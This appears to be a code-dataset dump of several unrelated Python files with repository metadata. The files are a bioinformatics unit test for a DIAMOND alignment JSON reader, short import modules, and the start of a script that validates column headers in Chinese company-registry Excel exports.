'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9631267|ref|NC_001989.1| Bovine RSV',
'length': 5046,
'hsps': [
{
'sbjct_start': 4039,
'sbjct_end': 4070,
'bits': 87.848,
'btop': '',
'frame': 1,
'query_start': 2,
'expect': 6.03169e-17,
'query_end': 98,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTC'
'CTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCTA'
'TAATTATACCACT'),
}
]
}
],
'query': 'id2'
},
{
'alignments': [],
'query': 'id4'
},
]
_JSON_RECORDS_ONE_END = [
{
'application': 'DIAMOND',
'version': 'v0.8.23',
'reference': ('Buchfink et al., Fast and Sensitive Protein '
'Alignment using DIAMOND, Nature Methods, 12, 59-60 '
'(2015)'),
'task': 'blastx',
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 1817,
'sbjct_end': 1849,
'bits': 165.393,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 2.73597e-40,
'query_end': 99,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGT'
'TTTCGGGGGTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGT'
'GTTTTGTTGTGGTTG'),
}
]
}
],
'query': 'id1'
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 4074,
'sbjct_end': 4106,
'bits': 178.016,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 4.33545e-44,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9629367|ref|NC_001803.1| RSV',
'length': 5063,
'hsps': [
{
'sbjct_start': 4062,
'sbjct_end': 4094,
'bits': 123.915,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 8.37678e-28,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9631267|ref|NC_001989.1| Bovine RSV',
'length': 5046,
'hsps': [
{
'sbjct_start': 4039,
'sbjct_end': 4070,
'bits': 87.848,
'btop': '',
'frame': 1,
'query_start': 2,
'expect': 6.03169e-17,
'query_end': 98,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTC'
'CTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCTA'
'TAATTATACCACT'),
}
]
}
],
'query': 'id2'
},
{
'alignments': [],
'query': 'id3'
},
]
_JSON_RECORDS_ONE_START = [
{
'application': 'DIAMOND',
'version': 'v0.8.23',
'reference': ('Buchfink et al., Fast and Sensitive Protein '
'Alignment using DIAMOND, Nature Methods, 12, 59-60 '
'(2015)'),
'task': 'blastx',
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 4074,
'sbjct_end': 4106,
'bits': 178.016,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 4.33545e-44,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9629367|ref|NC_001803.1| RSV',
'length': 5063,
'hsps': [
{
'sbjct_start': 4062,
'sbjct_end': 4094,
'bits': 123.915,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 8.37678e-28,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9631267|ref|NC_001989.1| Bovine RSV',
'length': 5046,
'hsps': [
{
'sbjct_start': 4039,
'sbjct_end': 4070,
'bits': 87.848,
'btop': '',
'frame': 1,
'query_start': 2,
'expect': 6.03169e-17,
'query_end': 98,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTC'
'CTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCTA'
'TAATTATACCACT'),
}
]
}
],
'query': 'id2'
},
{
'alignments': [],
'query': 'id3'
},
{
'alignments': [],
'query': 'id4'
},
]
_JSON_RECORDS_TWO_END = [
{
'application': 'DIAMOND',
'version': 'v0.8.23',
'reference': ('Buchfink et al., Fast and Sensitive Protein '
'Alignment using DIAMOND, Nature Methods, 12, 59-60 '
'(2015)'),
'task': 'blastx',
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 1817,
'sbjct_end': 1849,
'bits': 165.393,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 2.73597e-40,
'query_end': 99,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGT'
'TTTCGGGGGTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGT'
'GTTTTGTTGTGGTTG'),
}
]
}
],
'query': 'id1 1'
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 4074,
'sbjct_end': 4106,
'bits': 178.016,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 4.33545e-44,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9629367|ref|NC_001803.1| RSV',
'length': 5063,
'hsps': [
{
'sbjct_start': 4062,
'sbjct_end': 4094,
'bits': 123.915,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 8.37678e-28,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9631267|ref|NC_001989.1| Bovine RSV',
'length': 5046,
'hsps': [
{
'sbjct_start': 4039,
'sbjct_end': 4070,
'bits': 87.848,
'btop': '',
'frame': 1,
'query_start': 2,
'expect': 6.03169e-17,
'query_end': 98,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTC'
'CTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCTA'
'TAATTATACCACT'),
}
]
}
],
'query': 'id2 2'
},
]
def _recordsToStr(records):
"""
Convert a list of DIAMOND JSON records to a string.
@param records: A C{list} of C{dict}s as would be found in our per-line
JSON conversion of DIAMOND's tabular output.
@return: A C{str} suitable for use in a test simulating reading input
containing our per-line JSON.
"""
return '\n'.join(dumps(record) for record in records) + '\n'
JSON = _recordsToStr(_JSON_RECORDS)
JSON_ONE_MIDDLE = _recordsToStr(_JSON_RECORDS_ONE_MIDDLE)
JSON_ONE_END = _recordsToStr(_JSON_RECORDS_ONE_END)
JSON_ONE_START = _recordsToStr(_JSON_RECORDS_ONE_START)
JSON_TWO_END = _recordsToStr(_JSON_RECORDS_TWO_END)
class TestJSONRecordsReader(TestCase):
"""
Test the JSONRecordsReader class.
"""
def testCorrectNumberOfAlignments(self):
"""
A JSONRecordsReader must return the expected number of alignments.
"""
reads = Reads([
AARead(
'id1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignments = list(reader.readAlignments(reads))
self.assertEqual(4, len(alignments))
def testCorrectNumberOfAlignmentsMatchMissingMiddle(self):
"""
A JSONRecordsReader must return the expected number of alignments, if
a match is missing in the middle of the JSON file.
"""
reads = Reads([
AARead(
'id1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON_ONE_MIDDLE)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignments = list(reader.readAlignments(reads))
self.assertEqual(4, len(alignments))
def testCorrectNumberOfAlignmentsMatchMissingEnd(self):
"""
A JSONRecordsReader must return the expected number of alignments, if
the last read has no matches. (That read will not be examined by the
JSONRecordsReader.)
"""
reads = Reads([
AARead(
'id1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON_ONE_END)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignments = list(reader.readAlignments(reads))
self.assertEqual(3, len(alignments))
def testCorrectNumberOfAlignmentsMatchMissingStart(self):
"""
A JSONRecordsReader must return the expected number of alignments, if
the first read has no matches.
"""
reads = Reads([
AARead(
'id1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON_ONE_START)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignments = list(reader.readAlignments(reads))
self.assertEqual(4, len(alignments))
def testCorrectNumberOfAlignmentsTwoMatchesMissingEnd(self):
"""
A JSONRecordsReader must return the expected number of alignments, if
two reads at the end don't have any matches. (Those reads will not be
examined by the JSONRecordsReader.)
"""
reads = Reads([
AARead(
'id1 1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2 2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3 3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4 4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON_TWO_END)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignments = list(reader.readAlignments(reads))
self.assertEqual(2, len(alignments))
def testSpacesMustBePreserved(self):
"""
A JSONRecordsReader must return the right query and subject titles,
even if they have spaces.
"""
reads = Reads([
AARead(
'id1 1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2 2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3 3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4 4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON_TWO_END)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignment = list(reader.readAlignments(reads))[0]
self.assertEqual('id1 1', alignment.read.id)
def testSpaceInReadIdNotInJSONRecord(self):
"""
A JSONRecordsReader must return the right query and subject titles,
when the read ids have spaces in them but the titles in the JSON have
been truncated at the first space (as in the SAM format output of the
BWA 'mem' command).
"""
reads = Reads([
AARead(
'id1 1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2 2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3 3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4 4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignment = list(reader.readAlignments(reads))[0]
self.assertEqual('id1 1', alignment.read.id)
class TestDiamondTabularFormatToDicts(TestCase):
"""
Tests for the diamondTabularFormatToDicts function.
"""
def testDuplicatesInFieldNameList(self):
"""
If a field name list that contains duplicates is passed, the
DiamondTabularFormat __init__ function must raise a ValueError.
"""
error = '^field names contains duplicated names: a, b\\.$'
assertRaisesRegex(
self, ValueError, error,
DiamondTabularFormat, ['a', 'b', 'a', 'c', 'b'])
def testTooFewFields(self):
"""
If an input line does not have enough fields, a ValueError must be
raised.
"""
dtf = DiamondTabularFormat(['a', 'b', 'c'])
data = StringIO('a\tb\n')
error = (
r"^DIAMOND output line had 2 field values \(expected 3\)\. "
r"The offending input line was 'a\\tb\\n'\.")
assertRaisesRegex(
self, ValueError, error, list,
dtf.diamondTabularFormatToDicts(data))
def testTooManyFields(self):
"""
If an input line has too many fields, a ValueError must be raised.
"""
dtf = DiamondTabularFormat(['a', 'b'])
data = StringIO('a\tb\tc\n')
error = (
r"^DIAMOND output line had 3 field values \(expected 2\)\. "
r"The offending input line was 'a\\tb\\tc\\n'\.")
assertRaisesRegex(
self, ValueError, error, list,
dtf.diamondTabularFormatToDicts(data))
def testUnknownField(self):
"""
An unknown field name must result in a returned field name and value
that are identical to those in the function call and its input string.
"""
dtf = DiamondTabularFormat(['__blah__'])
data = StringIO('3.5\n')
(result,) = list(dtf.diamondTabularFormatToDicts(data))
self.assertEqual({'__blah__': '3.5'}, result)
def testConversions(self):
"""
The fields in input lines must be recognized and converted to their
correct types.
"""
fields = [
'bitscore',
'evalue',
'frame',
'identicalCount',
'positiveCount',
'qstart',
'qend',
'sstart',
'send',
'qseq',
]
data = StringIO(
('3.5 1.7 1 7 4 10 12 1 2 ACGT\n'
'3.6 1.8 2 8 5 11 13 2 3 TGCA').replace(' ', '\t') + '\n'
)
dtf = DiamondTabularFormat(fields)
(result1, result2) = list(dtf.diamondTabularFormatToDicts(data))
self.assertEqual(
{
'bitscore': 3.5,
'evalue': 1.7,
'frame': 1,
'identicalCount': 7,
'positiveCount': 4,
'qstart': 10,
'qend': 12,
'sstart': 1,
'send': 2,
'qseq': 'ACGT',
},
result1)
self.assertEqual(
{
'bitscore': 3.6,
'evalue': 1.8,
'frame': 2,
'identicalCount': 8,
'positiveCount': 5,
'qstart': 11,
'qend': 13,
'sstart': 2,
'send': 3,
'qseq': 'TGCA',
},
result2)
| 36.879671 | 79 | 0.419316 | 4,190 | 58,233 | 5.745107 | 0.111933 | 0.010469 | 0.019109 | 0.011839 | 0.805251 | 0.783026 | 0.768154 | 0.761673 | 0.759347 | 0.755941 | 0 | 0.084574 | 0.48081 | 58,233 | 1,578 | 80 | 36.903042 | 0.711616 | 0.061391 | 0 | 0.696645 | 0 | 0.007852 | 0.29205 | 0.103159 | 0 | 0 | 0 | 0 | 0.019986 | 1 | 0.014989 | false | 0 | 0.008565 | 0 | 0.02641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
145c2be6b920c88f5f4e5c97df3d601830862ca6 | 235 | py | Python | test/test_pgmagick_color.py | veryhappythings/pgmagick | 5dce5fa4681400b4c059431ad69233e6a3e5799a | [
"MIT"
] | 136 | 2015-07-15T12:49:36.000Z | 2022-03-24T12:30:25.000Z | test/test_pgmagick_color.py | veryhappythings/pgmagick | 5dce5fa4681400b4c059431ad69233e6a3e5799a | [
"MIT"
] | 59 | 2015-12-28T21:40:37.000Z | 2022-03-31T13:11:50.000Z | test/test_pgmagick_color.py | veryhappythings/pgmagick | 5dce5fa4681400b4c059431ad69233e6a3e5799a | [
"MIT"
] | 33 | 2015-12-04T08:00:07.000Z | 2022-01-28T23:39:25.000Z | import sys
sys.path.append('../')
sys.path.append('./')
from pgmagick import Color
from pgmagick import ColorHSL
from pgmagick import ColorGray
from pgmagick import ColorMono
from pgmagick import ColorRGB
from pgmagick import ColorYUV
| 23.5 | 30 | 0.808511 | 32 | 235 | 5.9375 | 0.375 | 0.378947 | 0.568421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119149 | 235 | 9 | 31 | 26.111111 | 0.917874 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.777778 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1465451fddf8a6f1c29cf9e15f859ceb7c8c80f8 | 39 | py | Python | data/sampler.py | josmople/pytorch_utils | 4952f7600109a707d6b8ec8e626098c6d208299a | [
"MIT"
] | 1 | 2021-04-29T11:50:10.000Z | 2021-04-29T11:50:10.000Z | data/sampler.py | SolitaryKnife/pytorch_utils | 114964073387b5e88412ccbd4d4cadca538d5156 | [
"MIT"
] | null | null | null | data/sampler.py | SolitaryKnife/pytorch_utils | 114964073387b5e88412ccbd4d4cadca538d5156 | [
"MIT"
] | null | null | null | from torch.utils.data.sampler import *
| 19.5 | 38 | 0.794872 | 6 | 39 | 5.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1adc72b435ee5d5bf56460114dc30f8748bec849 | 62 | py | Python | baselines/full_supervision/plmodules/__init__.py | RobinCamarasa/Boundary-Point-Extraction | ab92c16c2e84fb41f3403ed30ebd6f0737c303ae | [
"MIT"
] | null | null | null | baselines/full_supervision/plmodules/__init__.py | RobinCamarasa/Boundary-Point-Extraction | ab92c16c2e84fb41f3403ed30ebd6f0737c303ae | [
"MIT"
] | null | null | null | baselines/full_supervision/plmodules/__init__.py | RobinCamarasa/Boundary-Point-Extraction | ab92c16c2e84fb41f3403ed30ebd6f0737c303ae | [
"MIT"
] | null | null | null | from .diameter_modules import CarotidArteryFullSupervisionNet
| 31 | 61 | 0.919355 | 5 | 62 | 11.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 62 | 1 | 62 | 62 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1ae0616a0b9570088aa8c481f33d962bea37de6e | 159 | py | Python | jupyterhack/__init__.py | threemeninaboat3247/jupyterhack | 395dacba8630857153543e1d6ede40efac56ef42 | [
"MIT"
] | null | null | null | jupyterhack/__init__.py | threemeninaboat3247/jupyterhack | 395dacba8630857153543e1d6ede40efac56ef42 | [
"MIT"
] | null | null | null | jupyterhack/__init__.py | threemeninaboat3247/jupyterhack | 395dacba8630857153543e1d6ede40efac56ef42 | [
"MIT"
] | null | null | null | from jupyterhack.MyGraph import MyGraphWindow as GraphWindow
from jupyterhack.MyView import getRoot
from jupyterhack.MyFunctions import differentiate,MyFitting | 53 | 60 | 0.893082 | 18 | 159 | 7.888889 | 0.666667 | 0.316901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081761 | 159 | 3 | 61 | 53 | 0.972603 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1aee0fb556efb144ce8825503e3e3af7403d5f74 | 7,696 | py | Python | KnowledgeMapping/SpiderExp/1-Code/qichacha_down/readQccExcel.py | nickliqian/ralph_doc_to_chinese | be120ce2bb94a8e8395630218985f5e51ae087d9 | [
"MIT"
] | 8 | 2018-05-22T01:11:33.000Z | 2020-03-19T01:44:55.000Z | KnowledgeMapping/SpiderExp/1-Code/qichacha_down/readQccExcel.py | yangliangguang/keep_learning | 47ab39c726cb28713ad22bf4cf39d6b146715910 | [
"MIT"
] | null | null | null | KnowledgeMapping/SpiderExp/1-Code/qichacha_down/readQccExcel.py | yangliangguang/keep_learning | 47ab39c726cb28713ad22bf4cf39d6b146715910 | [
"MIT"
] | 3 | 2018-07-25T09:31:53.000Z | 2019-09-14T14:05:31.000Z | import xlrd
import os
import pymysql
def check_file_format():
file_list = os.listdir(base_path)
file_list.sort()
exp_header_1 = ['企业名称', '省份', '城市', '统一社会信用代码', '法定代表人', '企业类型', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址', '电话号码', '电话号码(更多号码)']
exp_header_2 = ['企业名称', '法人', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址']
exp_header_3 = ['企业名称', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址']
exp_header_4 = ['企业名称', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '电话号码', '经营范围', '网址']
exp_header_5 = ['企业名称', '统一社会信用代码', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '电话号码', '经营范围', '网址']
exp_header_6 = ['企业名称', '统一社会信用代码', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '电话号码', '经营范围', '网址', '电话号码(含更多号码)']
exp_header_7 = ['企业名称', '省份', '城市', '统一社会信用代码', '法定代表人', '企业类型', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址', '电话号码(含更多号码)']
for i, file_name in enumerate(file_list):
file_path = os.path.join(base_path, file_name)
data = xlrd.open_workbook(file_path) # 打开xls文件
table = data.sheets()[0] # 打开第一张表
# nrows = table.nrows # 获取表的行数
header = table.row_values(0) # 第一行
if header not in (exp_header_1, exp_header_2, exp_header_3, exp_header_4, exp_header_5, exp_header_6, exp_header_7):
print("[{}] {}: fail".format(i, file_name))
print("{} {}".format(len(header), header))
print("字段与预设的不一致")
break
else:
print("[{}] {}: pass".format(i, file_name))
# for i in range(nrows): # 循环逐行打印
# if i == 0: # 跳过第一行
# continue
# print(table.row_values(i)[:13]) # 取前十三列
print("file count: {}".format(len(file_list)))
def main():
exp_header_1 = ['企业名称', '省份', '城市', '统一社会信用代码', '法定代表人', '企业类型', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址', '电话号码', '电话号码(更多号码)']
exp_header_2 = ['企业名称', '法人', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址']
exp_header_3 = ['企业名称', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址']
exp_header_4 = ['企业名称', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '电话号码', '经营范围', '网址']
exp_header_5 = ['企业名称', '统一社会信用代码', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '电话号码', '经营范围', '网址']
